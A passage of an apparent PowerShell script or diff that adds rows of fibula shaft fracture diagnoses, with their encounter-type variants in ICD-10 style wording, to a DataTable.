oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left fibula","Nondisplaced oblique fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified fibula","Nondisplaced oblique fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right fibula","Displaced spiral fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left fibula","Displaced spiral fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified fibula","Displaced spiral fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right fibula","Nondisplaced spiral fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left fibula","Nondisplaced spiral fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified fibula","Nondisplaced spiral fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right fibula","Displaced comminuted fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left fibula","Displaced comminuted fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced 